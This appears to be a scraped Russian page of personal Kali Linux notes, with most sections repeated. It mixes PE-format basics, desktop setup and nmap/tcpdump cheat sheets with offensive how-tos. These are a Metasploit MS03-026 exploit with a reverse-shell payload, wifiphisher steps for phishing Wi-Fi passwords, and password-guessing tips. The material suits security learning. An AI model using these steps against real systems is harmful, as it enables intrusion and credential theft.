kali — b14esh.com

pe_format7

DOS заголовок
четыре байта 4D 5a   значение Mz
текст ..program cannot be run Dos mode.
так же  адрес начало pe заголовка. 50 45 значение Pe

PE заголовок
5045 значение Pe
Здесь мы можем увидеть список секций. обычно не больше 10.
У каждой секции есть атрибуты чтения, записи и исполнения.
Имена секций не фиксированы называться могут как угодно.

.text - секция кода где содержится код программы. 

Чаще всего стоит запрет на запись. Разрешено выполнение и чтение.
.data - секция данных. данные для работы программы.

Чаще всего стоит запрет на выполнение. Запись и чтение разрешено.
.rdata - таблица импорта. перечислены нужные библиотеки для работы программы.

.rsrc - ресурсы программы. Картинки, иконки, звуки и мелодии.



petools программа для ковыряния исполнительных файлов.
entry point адресс входа в программу

DOS заголовок

четыре байта 4D 5a значение Mz

текст ..program cannot be run Dos mode.

так же адрес начало pe заголовка. 50 45 значение Pe

PE заголовок

5045 значение Pe

Здесь мы можем увидеть список секций. обычно не больше 10.

У каждой секции есть атрибуты чтения, записи и исполнения.

Имена секций не фиксированы называться могут как угодно.

.text - секция кода где содержится код программы.

Чаще всего стоит запрет на запись. Разрешено выполнение и чтение.

.data - секция данных. данные для работы программы.

Чаще всего стоит запрет на выполнение. Запись и чтение разрешено.

.rdata - таблица импорта. перечислены нужные библиотеки для работы программы.

.rsrc - ресурсы программы. Картинки, иконки, звуки и мелодии.

petools программа для ковыряния исполнительных файлов.

entry point адресс входа в программу

из одного видео по безопасности :)

Пользователь:

Пользователь никогда не должен иметь доступ к источнику информации.

1	Пользователь никогда не должен иметь доступ к источнику информации.

Вирусы:

Блокировщики
Диструкторы
Шифраторы
Шпионы
Ботнет-DDOS

Блокировщики

Диструкторы

Шифраторы

Шпионы

Ботнет-DDOS

Запуск:

1. autorun.inf
2. авто установщики / авто архивы
3. скрипты\зараженные страницы.
4. java \ flash \ ПО \ ОС \ дыры

1. autorun.inf

2. авто установщики / авто архивы

3. скрипты\зараженные страницы.

4. java \ flash \ ПО \ ОС \ дыры

Защита:

1. Сканирование
2. Запуск в песочнице
3. Отслеживание действий
4. Проверка записи
5. Полная проверка (drweb cureit) AVZ

1. Сканирование

2. Запуск в песочнице

3. Отслеживание действий

4. Проверка записи

5. Полная проверка (drweb cureit) AVZ

Запись неверной инфы в программу / данные:

вероятные события
1. остановка
2. не верный результат

90% - чтение данных
10% - записи данных

Два сервера первый запись и чтение. 
а второй резервный только запись
в сучили аварии основного сервера начинаем использовать резервный.

вероятные события

1. остановка

2. не верный результат

90% - чтение данных

10% - записи данных

Два сервера первый запись и чтение.

а второй резервный только запись

в сучили аварии основного сервера начинаем использовать резервный.

пароли — подбор:

1. 62 варианта
2. 62 в квадрате 3844
3. Не Болтай..... шоколадки рулят...
4. простые пароли
5. вскрываемые социальные пароли
6. одиночные слова и короткие фразы
7. пустой пароль

1. 62 варианта

2. 62 в квадрате 3844

3. Не Болтай..... шоколадки рулят...

4. простые пароли

5. вскрываемые социальные пароли

6. одиночные слова и короткие фразы

7. пустой пароль

dotNET

.NET = dotNET

.NET Framework

Виртуальная .NET машина - Common Language Runtime (CLR)

C Sharp = C# сишарп
J Sharp = J# джишарп
Visual Basic .NET визуал бейсик дотнет

Common Intermediate Launguage CIL - IL - промежуточный язык
http://en.wikipedia.org/wiki/List_of_CIL_instructions - инструкции

Инструменты
net.reflector + addons reflexil.netreflector
ilspy

Крэкми
Можем редактировать только il  язык

.NET = dotNET

.NET Framework

Виртуальная .NET машина - Common Language Runtime (CLR)

C Sharp = C# сишарп

J Sharp = J# джишарп

Visual Basic .NET визуал бейсик дотнет

Common Intermediate Launguage CIL - IL - промежуточный язык

http://en.wikipedia.org/wiki/List_of_CIL_instructions - инструкции

Инструменты

net.reflector + addons reflexil.netreflector

ilspy

Крэкми

Можем редактировать только il язык

termux / metasploit / kali / nethunter

Ссылки:

https://wiki.termux.com/wiki/%D0%AD%D0%BA%D1%80%D0%B0%D0%BD%D0%BD%D0%B0%D1%8F_%D0%BA%D0%BB%D0%B0%D0%B2%D0%B8%D0%B0%D1%82%D1%83%D1%80%D0%B0
https://wiki.termux.com/wiki/Kali_Nethunter

1 2	https://wiki.termux.com/wiki/%D0%AD%D0%BA%D1%80%D0%B0%D0%BD%D0%BD%D0%B0%D1%8F_%D0%BA%D0%BB%D0%B0%D0%B2%D0%B8%D0%B0%D1%82%D1%83%D1%80%D0%B0 https://wiki.termux.com/wiki/Kali_Nethunter

Старая доп панель:
vi ~/.termux/termux.properties

extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'],['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]

1	extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'],['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]

Kali Nethunter

Установка nethunter:
pkg install wget
wget https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter
chmod +x kalinethunter
bash kalinethunter

Решение проблем после установки:
apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt --fix-broken install
dpkg -i ./kali-archive-keyring_2018.1_all.deb

Установка nethunter:

pkg install wget

wget https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter

chmod +x kalinethunter

bash kalinethunter

Решение проблем после установки:

apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6

wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb

apt --fix-broken install

dpkg -i ./kali-archive-keyring_2018.1_all.deb

metasploit

pkg update
pkg install unstable-repo
pkg install metasploit
msfconsole
db_status
git init

----------
----------

use auxiliary/scanner/portscan/tcp
set PORTS 1-5000
set RHOSTS 192.168.88.161
run
search dcom
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/shell_reverse_tcp
show options
set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)
set LHOST 192.168.88.247  - IP злоумышленника
run
cd ..\..\
echo Hello! >  achtung.x
msg helo
можно вводить любую команду, как в обычном cmd.exe

pkg update

pkg install unstable-repo

pkg install metasploit

msfconsole

db_status

git init

----------

use auxiliary/scanner/portscan/tcp

set PORTS 1-5000

set RHOSTS 192.168.88.161

run

search dcom

use exploit/windows/dcerpc/ms03_026_dcom

set payload windows/shell_reverse_tcp

show options

set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)

set LHOST 192.168.88.247 - IP злоумышленника

run

cd ..\..\

echo Hello! > achtung.x

msg helo

можно вводить любую команду, как в обычном cmd.exe

как изменить фон GRUB в Kali Linux

/usr/share/images/desktop-base/desktop-grub.png - символьная ссылка
/usr/share/images/desktop-base/kali-grub.png - само изображение тут
mv /usr/share/images/desktop-base/kali-grub.png /usr/share/images/desktop-base/kali-grub.png.bak - переносим \ делаем bakup файла
cp wallpaper-1.png /usr/share/images/desktop-base/kali-grub.png  - копируем нашу новую заставку для grub
update-grub - просим grub перечитать конфиг файлы

/usr/share/images/desktop-base/desktop-grub.png - символьная ссылка

/usr/share/images/desktop-base/kali-grub.png - само изображение тут

mv /usr/share/images/desktop-base/kali-grub.png /usr/share/images/desktop-base/kali-grub.png.bak - переносим \ делаем bakup файла

cp wallpaper-1.png /usr/share/images/desktop-base/kali-grub.png - копируем нашу новую заставку для grub

update-grub - просим grub перечитать конфиг файлы

решение ошибки «Следующие подписи неверные» в Kali Linux

wget 'https://archive.kali.org/archive-key.asc'
apt-key add archive-key.asc

1 2	wget 'https://archive.kali.org/archive-key.asc' apt-key add archive-key.asc

x \ xwindows \ gnome \ Cinnamon \ KDE \ LXDE \ MATE

Cinnamon

sudo apt-get install kali-defaults kali-root-login desktop-base cinnamon - установка 

sudo update-alternatives --config x-session-manager - выбор окружения

sudo apt install lightdm - установка lightdm ( поможет если cinnamon не запустился )

sudo apt-get install kali-defaults kali-root-login desktop-base cinnamon - установка

sudo update-alternatives --config x-session-manager - выбор окружения

sudo apt install lightdm - установка lightdm ( поможет если cinnamon не запустился )

Установка Xfce в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies - установка
sudo apt-get remove xfce4 xfce4-places-plugin xfce4-goodies - для удаления

1 2	sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies - установка sudo apt-get remove xfce4 xfce4-places-plugin xfce4-goodies - для удаления

Установка KDE в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop - установка 
udo apt-get install kali-defaults kali-root-login desktop-base kde-standard - установка стандартная
sudo apt-get install kali-defaults kali-root-login desktop-base kde-full - установка полный набор пакетов

sudo apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard - удаление

sudo apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop - установка

udo apt-get install kali-defaults kali-root-login desktop-base kde-standard - установка стандартная

sudo apt-get install kali-defaults kali-root-login desktop-base kde-full - установка полный набор пакетов

sudo apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard - удаление

Установка LXDE в Kali Linux:

sudo apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base - установка 

sudo apt-get remove lxde-core lxde - удаление

sudo apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base - установка

sudo apt-get remove lxde-core lxde - удаление

Установка GNOME в Kali Linux:

sudo apt-get install gnome-core kali-defaults kali-root-login desktop-base - установка

sudo apt-get remove gnome-core - удаление

sudo apt-get install gnome-core kali-defaults kali-root-login desktop-base - установка

sudo apt-get remove gnome-core - удаление

Установка MATE в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base mate-core - установка

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment - установка mate-core и дополнения

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment-extra - установка и еще больше обновлений

sudo apt-get remove mate-core  - удаление

sudo apt-get install kali-defaults kali-root-login desktop-base mate-core - установка

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment - установка mate-core и дополнения

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment-extra - установка и еще больше обновлений

sudo apt-get remove mate-core - удаление

Установка e17 в Kali Linux:

sudo apt-get install e17 - установка

sudo apt-get remove e17 - удаление

sudo apt-get install e17 - установка

sudo apt-get remove e17 - удаление

Изменить окружение из установленных:

Используйте следующую команду чтобы выбрать главное окружение рабочего стола. 
Эта команда выведет список доступных вариантов.

sudo update-alternatives --config x-session-manager

Используйте следующую команду чтобы выбрать главное окружение рабочего стола.

Эта команда выведет список доступных вариантов.

sudo update-alternatives --config x-session-manager

очистка системы \ временные файлы \ кеш обновлений \

!!! Будь осторожен можно сломать дистрибутив
sudo apt-get autoremove -y - удаление не нужных файлов после установки ПО
sudo apt-get autoclean -y - удалить скачанные файлы архивов
sudo apt-get clean -y - удалить старые скачанные файлы архивов
sudo apt-get install -f -y - решение проблем с установкой по

!!! Будь осторожен можно сломать дистрибутив

sudo apt-get autoremove -y - удаление не нужных файлов после установки ПО

sudo apt-get autoclean -y - удалить скачанные файлы архивов

sudo apt-get clean -y - удалить старые скачанные файлы архивов

sudo apt-get install -f -y - решение проблем с установкой по

wi-fi настройка

iwconfig wlan0
iwconfig wlan0 essid name key password 
iwconfig wlan0 essid name key s:password

iwconfig wlan0

iwconfig wlan0 essid name key password

iwconfig wlan0 essid name key s:password

проверка и исправление репозиториев \ apt \ sources.list

Проверка файла sources.list:

if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi

if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi

Одно из решений, перепишем sources.list:

0. Делаем резервную копию
cp /etc/apt/sources.list /etc/apt/sources.list.`date +%Y-%m-%d`.back

1. Переписываем source.list 
echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list

2. Обновим систему
а) так
sudo apt update 
sudo apt upgrade -y 
sudo apt full-upgrade -y

б) или так
sudo apt update && sudo apt full-upgrade -y

0. Делаем резервную копию

cp /etc/apt/sources.list /etc/apt/sources.list.`date +%Y-%m-%d`.back

1. Переписываем source.list

echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list

2. Обновим систему

а) так

sudo apt update

sudo apt upgrade -y

sudo apt full-upgrade -y

б) или так

sudo apt update && sudo apt full-upgrade -y

tcpdump / снифер / sniffer

yum install tcpdump
apt install tcpdump

1 2	yum install tcpdump apt install tcpdump

tcpdump

tcpdump -i eth0 - !!! снифаем интерфейс eth0

tcpdump -n -i eth0 net 192.168.1.15  - трафик с/на IP

tcpdump -n -i eth0 net 192.168.1.0/24  - трафик с/в сеть

tcpdump -l > dump && tail -f dump  - Вывод с записью в файл

tcpdump -i eth0 -w traffic.eth0  - Информация о трафике записывается в бинарный файл traffic.eth0

tcpdump -i eth0 -s 0 -w traffic.eth0 - Запись + загрузка в бинарник

tcpdump -r traffic.eth0  - Читаем из файла

tcpdump port 80  - Весь трафик на 80 порт и ответы

tcpdump host google.com - Весь с/на google.com

tcpdump -i eth0 -X port \(110 or 143\) - Проверка pop и imap на безопасность

tcpdump -n -i eth0 icmp - Ловим pings

tcpdump -i eth0 -s 0 -A port 80 | grep GET - (-s 0 весь пакет, -A для ASCII)

tcpdump -npi iface_name ether src MAC-address  - узнать MAC устройства iface_name -имя интерфейса MAC-address -мак адрес устройства

tcpdump |grep -v ssh - поиск пакетов исключая пакеты ssh

tcpdump -i eth0 - !!! снифаем интерфейс eth0

tcpdump -n -i eth0 net 192.168.1.15 - трафик с/на IP

tcpdump -n -i eth0 net 192.168.1.0/24 - трафик с/в сеть

tcpdump -l > dump && tail -f dump - Вывод с записью в файл

tcpdump -i eth0 -w traffic.eth0 - Информация о трафике записывается в бинарный файл traffic.eth0

tcpdump -i eth0 -s 0 -w traffic.eth0 - Запись + загрузка в бинарник

tcpdump -r traffic.eth0 - Читаем из файла

tcpdump port 80 - Весь трафик на 80 порт и ответы

tcpdump host google.com - Весь с/на google.com

tcpdump -i eth0 -X port $110 or 143$ - Проверка pop и imap на безопасность

tcpdump -n -i eth0 icmp - Ловим pings

tcpdump -i eth0 -s 0 -A port 80 | grep GET - (-s 0 весь пакет, -A для ASCII)

tcpdump -npi iface_name ether src MAC-address - узнать MAC устройства iface_name -имя интерфейса MAC-address -мак адрес устройства

tcpdump |grep -v ssh - поиск пакетов исключая пакеты ssh

nmap \ сканер портов

nmap

nmap -v -A 192.168.0.101 - !!! стандартный скан одного хоста

nmap -sn 192.168.1.1-254 - !!! сканировать сеть с ip 192.168.15.1 по 192.168.15.254 (выявит живые хосты, используется arp,icmp)

nmap -sT -p 22,3389,80 192.168.1.1 - !!! проверить порт 22,3389 у хоста 192.168.1.1

nmap -sI host_zombie host_need_scan -p80-81 - !!! сканировать host_need_scan порты 80-81 через host_zombie 

nmap -O target.host.com - !!! информация о системе 

nmap -vv host.target.com  - !!! стандартный скан подробный вывод

nmap --traceroute ya.ru -p 80 - !!! выполнить traceroute ya.ru используя 80 порт 

nmap -sV 192.168.11.101 -p 3389 - !!! узнать информацию о хосте 192.168.11.101 по открытому порту 3389

nmap -sV ххх.ххх.ххх.ххх -p 1-65535 - опция -sV - служит для получения версий запущенных сервисов

nmap -sX -p 22 192.168.10.10-250 -oN /data/host.txt  - Сканирование машин с ip от 10 по 250  и запись результата
nmap -A -T4 192.168.100.123 - самый распространенный метод сканирования
nmap -v -sP 192.168.0.101/24 - выяснить какой IP каким хостом используется в сети 0/24
nmap -sP 192.168.16.0/24 - выяснить какой IP каким хостом используется в сети 0/24
nmap -sP 192.168.1.0/24 - Узнать занятые IP в сети 1.0/24 (IP, MAC, hostname)
nmap -sS -sV -O cb.vu - провести stealth SYN сканирование с определением типа и версии OS

nmap -sS -sV -O tager.ru - Скрытое SYN сканирование с определением типа и версии ОС

nmap -sS -O -p 21, 25, 80 www.site.com - сканируем www.site.com проверяем только 21, 25, 80 порты, 
                                         используем определение удалённой ОС (метод OS fingerprints) и стелс сканирование

nmap -sT -F -P0 -oN scan.txt www.site.com - сканируем www.site.com применяем обычное сканирование стандартных портов (1-1024), 
                                           с отменой ping-опросов и заносим результат в файл scan.txt

nmap -sU -D 8.8.8.8 8.8.4.4 localhost www.site.com - сканируем www.site.com проводим сканирование UDP-портов, 
                                                     при этом маскируемся двумя хостами (третий наш).


nmap 10.0.0.1 - сканировать порты пк  с IP 10.0.0.1
nmap -vv 10.0.0.1 - сканировать порты пк с IP 10.0.0.1 (подробный вывод)
nmap -vv -sP 10.0.0.0/24 - сканирует сеть 10.0.0.0/24
nmap -vv -P0 -O -p 100-200 10.0.0.1 - сканирует хост 10.0.0.1 (без пинга, вывод инф. об ОС, порты с 100-200)

nmap -v -A 192.168.0.101 - !!! стандартный скан одного хоста

nmap -sn 192.168.1.1-254 - !!! сканировать сеть с ip 192.168.15.1 по 192.168.15.254 (выявит живые хосты, используется arp,icmp)

nmap -sT -p 22,3389,80 192.168.1.1 - !!! проверить порт 22,3389 у хоста 192.168.1.1

nmap -sI host_zombie host_need_scan -p80-81 - !!! сканировать host_need_scan порты 80-81 через host_zombie

nmap -O target.host.com - !!! информация о системе

nmap -vv host.target.com - !!! стандартный скан подробный вывод

nmap --traceroute ya.ru -p 80 - !!! выполнить traceroute ya.ru используя 80 порт

nmap -sV 192.168.11.101 -p 3389 - !!! узнать информацию о хосте 192.168.11.101 по открытому порту 3389

nmap -sV ххх.ххх.ххх.ххх -p 1-65535 - опция -sV - служит для получения версий запущенных сервисов

nmap -sX -p 22 192.168.10.10-250 -oN /data/host.txt - Сканирование машин с ip от 10 по 250 и запись результата

nmap -A -T4 192.168.100.123 - самый распространенный метод сканирования

nmap -v -sP 192.168.0.101/24 - выяснить какой IP каким хостом используется в сети 0/24

nmap -sP 192.168.16.0/24 - выяснить какой IP каким хостом используется в сети 0/24

nmap -sP 192.168.1.0/24 - Узнать занятые IP в сети 1.0/24 (IP, MAC, hostname)

nmap -sS -sV -O cb.vu - провести stealth SYN сканирование с определением типа и версии OS

nmap -sS -sV -O tager.ru - Скрытое SYN сканирование с определением типа и версии ОС

nmap -sS -O -p 21, 25, 80 www.site.com - сканируем www.site.com проверяем только 21, 25, 80 порты,

используем определение удалённой ОС (метод OS fingerprints) и стелс сканирование

nmap -sT -F -P0 -oN scan.txt www.site.com - сканируем www.site.com применяем обычное сканирование стандартных портов (1-1024),

с отменой ping-опросов и заносим результат в файл scan.txt

nmap -sU -D 8.8.8.8 8.8.4.4 localhost www.site.com - сканируем www.site.com проводим сканирование UDP-портов,

при этом маскируемся двумя хостами (третий наш).

nmap 10.0.0.1 - сканировать порты пк с IP 10.0.0.1

nmap -vv 10.0.0.1 - сканировать порты пк с IP 10.0.0.1 (подробный вывод)

nmap -vv -sP 10.0.0.0/24 - сканирует сеть 10.0.0.0/24

nmap -vv -P0 -O -p 100-200 10.0.0.1 - сканирует хост 10.0.0.1 (без пинга, вывод инф. об ОС, порты с 100-200)

Некоторые другие полезные инструменты:

hping (http://www.hping.org) - сборщик/анализатор IP пакетов
fping (fping.sourceforge.net) - сборщик/анализатор IP пакетов
round-robin - проверка хостов

hping (http://www.hping.org) - сборщик/анализатор IP пакетов

fping (fping.sourceforge.net) - сборщик/анализатор IP пакетов

round-robin - проверка хостов

wifiphisher / wi-fi

https://www.kali.org/ - ссылка
aireplay-ng -9 wlan0 - проверить подходит ли ваша плата для инжекта
git clone https://github.com/wifiphisher/wifiphisher - ставим по
cd wifisphisher - переходим в каталог
python setup.py install  - ставим по wifiphisher
wifiphisher - запускаем по
1 - у атакуемых устройств в правом нижнем угле высветится сеть и потребует повторной авторизации. 
2 - у атакуемых устройств высветится  сообщение от роутера о том, что необходимо обновить программное обеспечение. 
И потребует ввести ключ безопасности.
Ждем пароль =) как только все покраснеет жмем ctrl+c и увидем пароли

https://www.kali.org/ - ссылка

aireplay-ng -9 wlan0 - проверить подходит ли ваша плата для инжекта

git clone https://github.com/wifiphisher/wifiphisher - ставим по

cd wifisphisher - переходим в каталог

python setup.py install - ставим по wifiphisher

wifiphisher - запускаем по

1 - у атакуемых устройств в правом нижнем угле высветится сеть и потребует повторной авторизации.

2 - у атакуемых устройств высветится сообщение от роутера о том, что необходимо обновить программное обеспечение.

И потребует ввести ключ безопасности.

Ждем пароль =) как только все покраснеет жмем ctrl+c и увидем пароли

kali / pi zero w

Источник:

https://www.youtube.com/watch?v=3J8DV-55VI0
https://docs.google.com/document/d/13qEmq9KPhFfX7WIE2u-qK4tB28BIBJqDMD8NUU-3JKE/edit

1 2	https://www.youtube.com/watch?v=3J8DV-55VI0 https://docs.google.com/document/d/13qEmq9KPhFfX7WIE2u-qK4tB28BIBJqDMD8NUU-3JKE/edit

1) качаем прошивку (ОС) - https://www.offensive-security.com/kali-linux-arm-images/
качаем 7zip - https://www.7-zip.org/
качаем Etcher 

2) через Etcher устанавливаем прошивку

3) Вытаскиваем флешку из компьютера и вставляем вновь.

4) В корне флешки создаем пустой файл ssh , не ssh.txt , а просто shh, без расширения.

5) Теперь вытаскиваем флэху. 
Вставляем её в Pi, и включаем её. 
Здесь есть два разъема. 
Первый (pwr) идет только на питание, а второй (usb) идет для передачи данных и сопряжения с внешними устройствами.
Можно подключить и мышку, и клавиатуру и монитор через micro hdmi, но потребуется наличие разветвителя OTG на много USB разъемов, но работать оно всё будет.
Собрали это это чудо и смотрим в настройки модема. 
Здесь должна появится наша малина и её ИП адрес. 
Но в модеме мы не узнаем какое из устройств является raspberry. 
Поэтому воспользуемся программой IP scanner (есть и на ПК и на смартфон). 
Узнаем IP адрес raspberry

6) Далее в Putty прописываем IP адрес, порт не трогаем. 
Логин root , пароль toor .

ЭТОТ ПУНКТ МОЖЕТ БЫТЬ НЕНУЖНЫМ. Моя прошивка была багнутая, возможно у вас все будет нормально.

Если после команд:
git clone https://github.com/PNPtutorials/PNP-PortableHackingMachine-Pi-Zero-W
У вас появилось окно с ошибками, что на флешке не хватает места то смотрим пункт 7.

7) Если все получилось, но места оказалось мало то выключаем устройство и идем в Linux.

8) Прописываем команду gparted

9) Переключаемся на флешку в правом верхнем углу. 
И если мы здесь видим, что прошивка занимает все место, 
и есть не размеченная область, то увеличиваем место на флешке, сохраняем изменения.

10) Вытаскиваем флешку и вставляем в ПК. 
Делаем подключение через Putty.
Вводим логин и пароль.

11) Пишем 
git clone https://github.com/PNPtutorials/PNP-PortableHackingMachine-Pi-Zero-W

12) 
ls
видим скачанный репозиторий. 
у меня он называется PNP-PortableHackingMachine-Pi-Zero-W 

13) Прописываем
cd PNP-PortableHackingMachine-Pi-Zero-W 
ls
chmod +x install.sh
./install/sh

и ждем завершения
далее пишем
reboot

14) Настраиваем сеть
Подключаемся заново через Putty
пишем
sudo nano /etc/network/interfaces
Если ошибка с SWP файлом то выходим из редактора и удаляем его
sudo rm /etc/network/.interfaces.swp
Затем опять пишем 
sudo nano /etc/network/interfaces

Вставляем код
-----/etc/network/interfaces-----

auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

auto wlan0
iface wlan0 inet dhcp

allow-hotplug usb0
iface usb0 inet static
address 192.168.42.42
netmask 255.255.255.0
network 192.168.42.0
broadcast 192.168.42.255
gateway 192.168.42.41
-----/etc/network/interfaces-----
Сохраняем CTRL+X, Y, entrer


15) Настраиваем WiFi
sudo nano /etc/wpa_supplicant/wpa_supplicant.conf

пишем

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev          
update_config=1                           
country=RU                                                                            
network={                        
        ssid="ВАША_ТОЧКА_ДОСТУПА"                         
        psk="ВАШ_ПАРОЛЬ"                             
        key_mgmt=WPA-PSK                                         
}  


Сохраняем CTRL+X, Y, entrer

16) Перезагружаем Pi
reboot

17) Пока грузится raspberry активируем точку доступа на телефоне (если вы выбрали модем и он уже включен то просто ждите загрузки Raspberry)

18) Я делал все через телефон поэтому буду описывать все дальнейшие действия как делал я.
Смотрим на телефон, т.к. моя точка доступа была через телефон.
В IP сканере я вижу IP адрес raspberry. 
И делаю коннект с мобильного SSH mobile
Попробуем сделать ПИНГ, чтобы узнать есть ли интернет.
ping mail.ru

19) Смотрим поднялся ли VINO server для VNC
netstat -tupln

20) если да, то пишем в VNC Viewer IP адрес raspberry
Если нет то поднимаем в ручную:
vncserver
при первом запуске потребуется придумать пароль

21) снова вводим 
netstat -tupln и видим, сервак VNC.

22) Теперь делаем коннект через  VNC Viewer

23) Если все равно не получается поднять сервер VINO (для VNC) то используем RDP подключение.
apt-get install xrdp
service xrdp on
service xrdp start

24) Смотрим поднялся ли rdp сервер
netstat -tupln

25) Подключаемся через RDP через приложение Microsoft RDP в PlayMarket
Возможно после действий с RDP у вас как раз поднимется сервер VINO. 
Поэтому сами выбирайте как лучше производить подключение.


26) Далее устанавливаем websploit
git clone https://github.com/websploit/websploit
и устанавливаем scapy
apt-get install scapy
На этом все.

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

1) качаем прошивку (ОС) - https://www.offensive-security.com/kali-linux-arm-images/

качаем 7zip - https://www.7-zip.org/

качаем Etcher

2) через Etcher устанавливаем прошивку

3) Вытаскиваем флешку из компьютера и вставляем вновь.

4) В корне флешки создаем пустой файл ssh , не ssh.txt , а просто shh, без расширения.

5) Теперь вытаскиваем флэху.

Вставляем её в Pi, и включаем её.

Здесь есть два разъема.

Первый (pwr) идет только на питание, а второй (usb) идет для передачи данных и сопряжения с внешними устройствами.

Можно подключить и мышку, и клавиатуру и монитор через micro hdmi, но потребуется наличие разветвителя OTG на много USB разъемов, но работать оно всё будет.

Собрали это это чудо и смотрим в настройки модема.

Здесь должна появится наша малина и её ИП адрес.

Но в модеме мы не узнаем какое из устройств является raspberry.

Поэтому воспользуемся программой IP scanner (есть и на ПК и на смартфон).

Узнаем IP адрес raspberry

6) Далее в Putty прописываем IP адрес, порт не трогаем.

Логин root , пароль toor .

ЭТОТ ПУНКТ МОЖЕТ БЫТЬ НЕНУЖНЫМ. Моя прошивка была багнутая, возможно у вас все будет нормально.

Если после команд:

git clone https://github.com/PNPtutorials/PNP-PortableHackingMachine-Pi-Zero-W

У вас появилось окно с ошибками, что на флешке не хватает места то смотрим пункт 7.

7) Если все получилось, но места оказалось мало то выключаем устройство и идем в Linux.

8) Прописываем команду gparted

9) Переключаемся на флешку в правом верхнем углу.

И если мы здесь видим, что прошивка занимает все место,

и есть не размеченная область, то увеличиваем место на флешке, сохраняем изменения.

10) Вытаскиваем флешку и вставляем в ПК.

Делаем подключение через Putty.

Вводим логин и пароль.

11) Пишем

git clone https://github.com/PNPtutorials/PNP-PortableHackingMachine-Pi-Zero-W

12)

видим скачанный репозиторий.

у меня он называется PNP-PortableHackingMachine-Pi-Zero-W

13) Прописываем

cd PNP-PortableHackingMachine-Pi-Zero-W

chmod +x install.sh

./install/sh

и ждем завершения

далее пишем

reboot

14) Настраиваем сеть

Подключаемся заново через Putty

пишем

sudo nano /etc/network/interfaces

Если ошибка с SWP файлом то выходим из редактора и удаляем его

sudo rm /etc/network/.interfaces.swp

Затем опять пишем

sudo nano /etc/network/interfaces

Вставляем код

-----/etc/network/interfaces-----

auto lo

iface lo inet loopback

iface eth0 inet dhcp

allow-hotplug wlan0

iface wlan0 inet dhcp

wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf

iface default inet dhcp

auto wlan0

iface wlan0 inet dhcp

allow-hotplug usb0

iface usb0 inet static

address 192.168.42.42

netmask 255.255.255.0

network 192.168.42.0

broadcast 192.168.42.255

gateway 192.168.42.41

-----/etc/network/interfaces-----

Сохраняем CTRL+X, Y, entrer

15) Настраиваем WiFi

sudo nano /etc/wpa_supplicant/wpa_supplicant.conf

пишем

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev

update_config=1

country=RU

network={

ssid="ВАША_ТОЧКА_ДОСТУПА"

psk="ВАШ_ПАРОЛЬ"

key_mgmt=WPA-PSK

}

Сохраняем CTRL+X, Y, entrer

16) Перезагружаем Pi

reboot

17) Пока грузится raspberry активируем точку доступа на телефоне (если вы выбрали модем и он уже включен то просто ждите загрузки Raspberry)

18) Я делал все через телефон поэтому буду описывать все дальнейшие действия как делал я.

Смотрим на телефон, т.к. моя точка доступа была через телефон.

В IP сканере я вижу IP адрес raspberry.

И делаю коннект с мобильного SSH mobile

Попробуем сделать ПИНГ, чтобы узнать есть ли интернет.

ping mail.ru

19) Смотрим поднялся ли VINO server для VNC

netstat -tupln

20) если да, то пишем в VNC Viewer IP адрес raspberry

Если нет то поднимаем в ручную:

vncserver

при первом запуске потребуется придумать пароль

21) снова вводим

netstat -tupln и видим, сервак VNC.

22) Теперь делаем коннект через VNC Viewer

23) Если все равно не получается поднять сервер VINO (для VNC) то используем RDP подключение.

apt-get install xrdp

service xrdp on

service xrdp start

24) Смотрим поднялся ли rdp сервер

netstat -tupln

25) Подключаемся через RDP через приложение Microsoft RDP в PlayMarket

Возможно после действий с RDP у вас как раз поднимется сервер VINO.

